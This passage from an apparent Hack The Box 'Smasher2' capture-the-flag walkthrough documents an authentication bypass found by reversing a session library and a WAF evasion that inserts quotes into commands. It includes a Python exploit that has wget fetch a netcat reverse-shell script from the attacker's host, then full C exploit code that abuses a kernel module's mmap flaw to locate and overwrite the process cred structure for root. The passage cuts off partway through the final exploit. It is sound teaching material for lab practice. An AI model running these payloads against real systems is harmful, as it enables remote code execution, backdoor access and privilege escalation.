                ret["result"] = "Cannot authenticate with data: %s - %s" % (is_logged[1], "Too many tentatives, wait 2 minutes!" if manager.blocked else "Try again!")
            else:
                if tmp_user_login is not None:
                    log_creds(request.remote_addr, tmp_user_login)
                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
        except TypeError as e:
            ret["authenticated"] = False
            ret["result"] = str(e)
    else:
        ret["authenticated"] = False
        ret["result"] = "Cannot authenticate missing parameters."
    return jsonify(ret)


@app.route("/api/<key>/job", methods=['POST'])
def job(key):
    ret = {"success": None, "result": None}
    manager = safe_get_manager(session["id"])
    if manager.secret_key == key:
        data = request.get_json(silent=True)
        if data and type(data) == dict:
            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out
            else:
                ret["success"] = False
                ret["result"] = "Missing schedule parameter."
        else:
            ret["success"] = False
            ret["result"] = "Invalid value provided."
    else:
        ret["success"] = False
        ret["result"] = "Invalid token."
    return jsonify(ret)


app.run(host='127.0.0.1', port=5000)

I read the code and these are the things that interest us:
After successful authentication the server will respond with a secret key that we can use to access the endpoint /api/<key>/job:

                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]

That endpoint only accepts POST requests:

@app.route("/api/<key>/job", methods=['POST'])

And the sent data has to be json:

        data = request.get_json(silent=True)
        if data and type(data) == dict:
            ...

Through that endpoint we can execute system commands by providing them in a parameter called schedule:

            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out

session.so: Analysis –> Authentication Bypass

ses.so (the session manager library) is a compiled shared Python library; .so stands for shared object:

root@kali:~/Desktop/HTB/boxes/smasher2/backup# file ses.so 
ses.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0c67d40b77854318b10417b4aedfee95a52f0550, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

I opened it in ghidra and started checking the functions. Two functions caught my attention, get_internal_pwd() and get_internal_usr():


I looked at the decompiled code of both of them and noticed something strange: they were exactly the same.
get_internal_pwd():

undefined8 get_internal_pwd(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}

get_internal_usr():

undefined8 get_internal_usr(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}
root@kali:~/Desktop/HTB/boxes/smasher2/backup# diff getinternalusr getinternalpwd 
1c1
< undefined8 get_internal_usr(undefined8 param_1)
---
> undefined8 get_internal_pwd(undefined8 param_1)
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

So in theory, since the two functions are identical, providing the username as the password should work. This means that it’s just a matter of finding an existing username and we’ll be able to bypass the authentication.
I tried some common usernames before attempting to use wfuzz; Administrator worked:
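
The bypass itself is just the normal AJAX login with the username repeated as the password; a minimal sketch of the request (essentially what the getKey() function in the exploit further down does) looks like this:

#!/usr/bin/python3
# the username doubles as the password because get_internal_usr() and get_internal_pwd() return the same value
import requests

s = requests.Session()
s.get("http://wonderfulsessionmanager.smasher2.htb/login")  # grab a session cookie first
req = s.post("http://wonderfulsessionmanager.smasher2.htb/auth",
             json={"action": "auth", "data": {"username": "Administrator", "password": "Administrator"}})
print(req.json())  # a successful response contains the key for /api/<key>/job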



WAF Bypass –> RCE –> Shell as dzonerzy –> User Flag

I wrote a small script to execute commands through /api/<key>/job as we saw earlier in auth.py; the script was meant for testing purposes:

#!/usr/bin/python3
from requests import post

cookies = {"session":"eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg"}

while True:
	cmd = input("cmd: ")
	req = post("http://wonderfulsessionmanager.smasher2.htb/api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job", json={"schedule":cmd}, cookies=cookies)
	response = req.text
	print(response)

Testing with whoami worked just fine:

root@kali:~/Desktop/HTB/boxes/smasher2# ./test.py 
cmd: whoami
{"result":"dzonerzy\n","success":true}

cmd:

However when I tried other commands I got a 403 response indicating that the server was protected by a WAF:

cmd: curl http://10.10.xx.xx
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job
on this server.<br />
</p>

<address>Apache/2.4.29 (Ubuntu) Server at wonderfulsessionmanager.smasher2.htb Port 80</address>
</body></html>

cmd:

I could easily bypass it by inserting single quotes in the command:

cmd: 'w'g'e't 'h't't'p':'/'/'1'0'.'1'0'.'x'x'.'x'x'/'t'e's't'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request.  Either the server is overloaded or there is an error in the application.</p>

cmd:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.135 - - [13/Dec/2019 08:18:33] code 404, message File not found
10.10.10.135 - - [13/Dec/2019 08:18:33] "GET /test HTTP/1.1" 404 -

To automate the exploitation process I wrote this small exploit:

#!/usr/bin/python3 
import requests

YELLOW = "\033[93m"
GREEN = "\033[32m"

def getKey(session):
	req = session.post("http://wonderfulsessionmanager.smasher2.htb/auth", json={"action":"auth","data":{"username":"Administrator","password":"Administrator"}})
	response = req.json()
	key = response['result']['key']
	return key

def exploit(session, key):
	download_payload = "\'w\'g\'e\'t \'h\'t\'t\'p\':\'/\'/\'1\'0\'.\'1\'0\'.\'x\'x\'.\'x\'x\'/\'s\'h\'e\'l\'l\'.\'s\'h\'"
	print(YELLOW + "[+] Downloading payload")
	download_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":download_payload})
	print(GREEN + "[*] Done")
	exec_payload = "s\'h\' \'s\'h\'e\'l\'l\'.\'s\'h"
	print(YELLOW + "[+] Executing payload")
	exec_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":exec_payload})
	print(GREEN + "[*] Done. Exiting ...")
	exit()

session = requests.Session()
session.get("http://wonderfulsessionmanager.smasher2.htb/login")
print(YELLOW +"[+] Authenticating")
key = getKey(session)
print(GREEN + "[*] Session: " + session.cookies.get_dict()['session'])
print(GREEN + "[*] key: " + key)
exploit(session, key)

The exploit sends 2 commands: the first one is a wget command that downloads shell.sh, and the other one executes it.
shell.sh:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f

I hosted it on a Python web server, started a netcat listener on port 1337, then ran the exploit:


We owned user.

dhid.ko: Enumeration

After getting a shell I copied my public ssh key to /home/dzonerzy/.ssh/authorized_keys and got ssh access.
In the home directory of dzonerzy there was a README containing a message from him saying that we’ll need to think outside the box to root smasher2:

dzonerzy@smasher2:~$ ls -al
total 44
drwxr-xr-x 6 dzonerzy dzonerzy 4096 Feb 17  2019 .
drwxr-xr-x 3 root     root     4096 Feb 15  2019 ..
lrwxrwxrwx 1 dzonerzy dzonerzy    9 Feb 15  2019 .bash_history -> /dev/null
-rw-r--r-- 1 dzonerzy dzonerzy  220 Feb 15  2019 .bash_logout
-rw-r--r-- 1 dzonerzy dzonerzy 3799 Feb 16  2019 .bashrc
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .cache
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .gnupg
drwx------ 5 dzonerzy dzonerzy 4096 Feb 17  2019 .local
-rw-r--r-- 1 dzonerzy dzonerzy  807 Feb 15  2019 .profile
-rw-r--r-- 1 root     root      900 Feb 16  2019 README
drwxrwxr-x 4 dzonerzy dzonerzy 4096 Dec 13 12:50 smanager
-rw-r----- 1 root     dzonerzy   33 Feb 17  2019 user.txt
dzonerzy@smasher2:~$ cat README 


         .|'''.|                            '||                      
         ||..  '  .. .. ..    ....    ....   || ..     ....  ... ..  
          ''|||.   || || ||  '' .||  ||. '   ||' ||  .|...||  ||' '' 
        .     '||  || || ||  .|' ||  . '|..  ||  ||  ||       ||     
        |'....|'  .|| || ||. '|..'|' |'..|' .||. ||.  '|...' .||.    v2.0 
                                                             
                                                        by DZONERZY 

Ye you've come this far and I hope you've learned something new, smasher wasn't created
with the intent to be a simple puzzle game... but instead I just wanted to pass my limited
knowledge to you fellow hacker, I know it's not much but this time you'll need more than
skill, you will need to think outside the box to complete smasher 2 , have fun and happy

                                       Hacking!

free(knowledge);
free(knowledge);
* error for object 0xd00000000b400: pointer being freed was not allocated *


dzonerzy@smasher2:~$ 

After some enumeration, I checked the auth log and saw this line:

dzonerzy@smasher2:~$ cat /var/log/auth.log
----------
 Redacted
----------
Dec 13 11:49:34 smasher2 sudo:     root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/insmod /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
----------
 Redacted
----------
dzonerzy@smasher2:~$

insmod (which stands for insert module) is a tool used to load kernel modules. dhid.ko is a kernel module (.ko stands for kernel object).

dzonerzy@smasher2:~$ cd /lib/modules/4.15.0-45-generic/kernel/drivers/hid/
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

I checked the loaded kernel modules and that module was still loaded:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ lsmod | grep dhid
dhid                   16384  0
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

We can use modinfo to list the information about that module; as you can see, it was written by dzonerzy:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ modinfo dhid
filename:       /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
version:        1.0
description:    LKM for dzonerzy dhid devices
author:         DZONERZY
license:        GPL
srcversion:     974D0512693168483CADFE9
depends:        
retpoline:      Y
name:           dhid
vermagic:       4.15.0-45-generic SMP mod_unload 
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

The last thing I wanted to check was if there was a device driver file for the module:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ ls -la /dev/ | grep dhid
crwxrwxrwx  1 root root    243,   0 Dec 13 11:49 dhid
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

I downloaded the module on my box to start analyzing it:

root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa dzonerzy@10.10.10.135:/lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko ./
dhid.ko                                                                                                                                                                                                  100% 8872    16.1KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2#

dhid.ko: Analysis

I opened the module in ghidra then I started checking the functions:


The function dev_read() had a hint that this is the intended way to root the box:

long dev_read(undefined8 param_1,undefined8 param_2)

{
  int iVar1;
  
  __fentry__();
  iVar1 = _copy_to_user(param_2,"This is the right way, please exploit this shit!",0x30);
  return (ulong)(-(uint)(iVar1 == 0) & 0xf) - 0xe;
}

One interesting function that caught my attention was dev_mmap():

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    uVar2 = (ulong)uVar1;
    if (uVar1 == 0) {
      printk(&DAT_0010057b);
    }
    else {
      uVar2 = 0xfffffff5;
      printk(&DAT_00100567);
    }
  }
  else {
    uVar2 = 0xfffffff5;
    printk(&DAT_001003b0);
  }
  return uVar2;
}

In case you don’t know what mmap is: simply put, mmap is a system call used to map memory to a file or a device.
The function dev_mmap() is a custom mmap handler.
The interesting part here is the call to the remap_pfn_range() function (it remaps kernel memory to userspace):

remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);

I checked the documentation of remap_pfn_range() to learn more about it; the function takes 5 arguments:

int remap_pfn_range (	struct vm_area_struct * vma,
 	unsigned long addr,
 	unsigned long pfn,
 	unsigned long size,
 	pgprot_t prot);

Description of each argument:

struct vm_area_struct * vma
    user vma to map to

unsigned long addr
    target user address to start at

unsigned long pfn
    physical address of kernel memory

unsigned long size
    size of map area

pgprot_t prot
    page protection flags for this mapping

If we look at the function call again we can see that the 3rd and 4th arguments (the physical address of kernel memory and the size of the map area) are passed to the function without proper validation:

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    ...

The size check is performed on signed integers, so a huge size such as 0xf0000000 becomes negative when cast to int and slips past the comparison. This means that we can map any size of memory we want and read/write to it, allowing us to even access the kernel memory.

dhid.ko: Exploitation –> Root Shell –> Root Flag

Luckily, this white paper had a similar scenario and explained the exploitation process very well. I recommend reading it after finishing the write-up; I will try to explain the process as well as I can, but the paper is more detailed. In summary, what’s going to happen is that we’ll map a huge amount of memory and search through it for our process’s cred structure (the cred structure holds our process credentials), then overwrite our uid and gid with 0 and execute /bin/sh. Let’s go through it step by step.
First, we need to make sure that it’s really exploitable; we’ll try to map a huge amount of memory and check if it worked:

#include <stdio.h>
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}
	
	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);
	
	int stop = getchar();
	return 0;
}

I compiled the code and uploaded it to the box:

root@kali:~/Desktop/HTB/boxes/smasher2# gcc -o pwn pwn.c 
root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa ./pwn dzonerzy@10.10.10.135:/dev/shm/pwn
pwn                                                                                100%   17KB  28.5KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# 

Then I ran it:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 8186
[*] Open OK fd: 3
[*] mmap OK address: 42424000

From another ssh session I checked the process memory mapping; the attempt was successful:

dzonerzy@smasher2:/dev/shm$ cat /proc/8186/maps 
42424000-132424000 rw-s 00000000 00:06 440                               /dev/dhid
----------
 Redacted
----------
dzonerzy@smasher2:/dev/shm$

Now we can start searching for the cred structure that belongs to our process. Let’s take a look at what the cred structure looks like:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
}

We’ll notice that the first 8 integers (representing our uid, gid, saved uid, saved gid, effective uid, effective gid, and the uid and gid for the virtual file system) are known to us, which gives us a reliable pattern to search for in memory:

	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */

These 8 integers are followed by a variable called securebits:

    unsigned    securebits; /* SUID-less security management */

Then that variable is followed by our capabilities:

    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */

Since we know the first 8 integers we can search through the memory for that pattern. When we find a valid cred structure pattern we’ll overwrite each of the 8 integers with 0 and check if our uid changed to 0; we’ll keep doing that until we overwrite the one which belongs to our process. Then we’ll overwrite the capabilities with 0xffffffffffffffff and execute /bin/sh. Let’s try to implement the search for cred structures first.
To do that we will get our uid with getuid():

	unsigned int uid = getuid();

Then we search for 8 consecutive integers that are equal to our uid; when we find a cred structure we’ll print its pointer and keep searching:

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);
	
	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
	
	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();

	printf("[*] Current UID: %d\n", uid);

	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

	fflush(stdout);
	
	int stop = getchar();
	return 0;
}

It worked:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1215
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186d84, crednum: 5
[*] Cred structure found! ptr: 0x76186fc4, crednum: 6
[*] Cred structure found! ptr: 0x761872c4, crednum: 7
[*] Cred structure found! ptr: 0x76187684, crednum: 8
[*] Cred structure found! ptr: 0x76187984, crednum: 9
[*] Cred structure found! ptr: 0x76187b04, crednum: 10
[*] Cred structure found! ptr: 0x76187bc4, crednum: 11
[*] Cred structure found! ptr: 0x76187c84, crednum: 12
[*] Cred structure found! ptr: 0x77112184, crednum: 13
[*] Cred structure found! ptr: 0x771123c4, crednum: 14
[*] Cred structure found! ptr: 0x77112484, crednum: 15
[*] Cred structure found! ptr: 0x771129c4, crednum: 16
[*] Cred structure found! ptr: 0x77113084, crednum: 17
[*] Cred structure found! ptr: 0x77113144, crednum: 18
[*] Cred structure found! ptr: 0x77113504, crednum: 19
[*] Cred structure found! ptr: 0x77113c84, crednum: 20
[*] Cred structure found! ptr: 0x7714a604, crednum: 21
[*] Cred structure found! ptr: 0x7714aa84, crednum: 22
[*] Cred structure found! ptr: 0x7714ac04, crednum: 23
[*] Cred structure found! ptr: 0x7714afc4, crednum: 24
[*] Cred structure found! ptr: 0x7714ba44, crednum: 25
[*] Cred structure found! ptr: 0xb9327bc4, crednum: 26

dzonerzy@smasher2:/dev/shm$ 

Now we need to overwrite the cred structure that belongs to our process. We’ll keep overwriting every cred structure we find and checking our uid; when we overwrite the one that belongs to our process, our uid should become 0 (if it doesn’t, we restore the original values and keep searching):

			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){

	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("Failed to mmap: ");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();
	
	printf("[*] Current UID: %d\n", uid);
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){

		credIt = 0;
	
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
			
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
		
			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

			else{
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}

	addr++;
}

fflush(stdout);

int stop = getchar();
return 0;
}
dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 4773
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186fc4, crednum: 5
[*] Cred structure found! ptr: 0x76187684, crednum: 6
[*] Cred structure found! ptr: 0x76187bc4, crednum: 7
[*] Cred structure found! ptr: 0x77112184, crednum: 8
[*] Cred structure found! ptr: 0x771123c4, crednum: 9
[*] Cred structure found! ptr: 0x77112484, crednum: 10
[*] Cred structure found! ptr: 0x771129c4, crednum: 11
[*] Cred structure found! ptr: 0x77113084, crednum: 12
[*] Cred structure found! ptr: 0x77113144, crednum: 13
[*] Cred structure found! ptr: 0x77113504, crednum: 14
[*] Cred structure found! ptr: 0x77113c84, crednum: 15
[*] Cred structure found! ptr: 0x7714a484, crednum: 16
[*] Cred structure found! ptr: 0x7714a604, crednum: 17
[*] Cred structure found! ptr: 0x7714a6c4, crednum: 18
[*] Cred structure found! ptr: 0x7714a844, crednum: 19
[*] Cred structure found! ptr: 0x7714a9c4, crednum: 20
[*] Cred structure found! ptr: 0x7714aa84, crednum: 21
[*] Cred structure found! ptr: 0x7714ac04, crednum: 22
[*] Cred structure found! ptr: 0x7714ad84, crednum: 23
[*] Process cred structure found ptr: 0x7714ad84, crednum: 23

dzonerzy@smasher2:/dev/shm$

Great! Now all that’s left to do is overwrite the capabilities in our cred structure with 0xffffffffffffffff and execute /bin/sh:

				credIt += 1; /* skip securebits; the capability sets start right after it */
				/* 5 x 64-bit capability sets overwritten as 10 x 32-bit writes */
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);

pwn.c:

#include <stdio.h>                                                         
#include <stdlib.h>                                                      
#include <sys/types.h>                                                              
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("\033[93m[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("\033[93m[!] Open failed!\n");
		return -1;
	}

	printf("\033[32m[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("\033[93m[!] Failed to mmap !");
		close(fd);
		return -1;
	}

	printf("\033[32m[*] mmap OK address: %lx\n", addr);
	
	unsigned int uid = getuid();
	
	puts("\033[93m[+] Searching for the process cred structure ...");
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;
	
	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				
				credIt = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
